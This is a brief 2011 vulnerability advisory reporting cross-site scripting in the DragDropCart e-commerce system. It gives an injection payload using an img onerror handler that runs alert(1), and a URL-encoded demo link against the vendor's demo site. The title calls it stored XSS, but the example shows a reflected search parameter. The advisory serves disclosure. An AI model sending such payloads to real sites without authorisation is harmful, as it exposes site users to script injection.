DragDropCart suffers from a cross site scripting vulnerability.
f10e32fe7691b0b14aea4c13fbd8496ad47c493f4560ff2d96044af0cf2bdc67
# Exploit Title: DragDropCart (E-Commerce System) Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
ISSUE
Cross Site Scripting can be done using the command input
Vulnerable Page:
search.php
yaxal_user.php
Example:
search.php?search=<XSS Code>
Exploit:
"/></A></><img src=1.gif onerror=alert(1)>
Demo:
http://www.dragdropcart.com/demo/search.php?search=%22/%3E%3C/A%3E%3C/%3E%3Cimg%20src=1.gif%20onerror=alert%281%29%3E
Thanks,
Eyup CELIK
Bilgi Teknolojileri Güvenlik Uzmani
http://www.eyupcelik.com.tr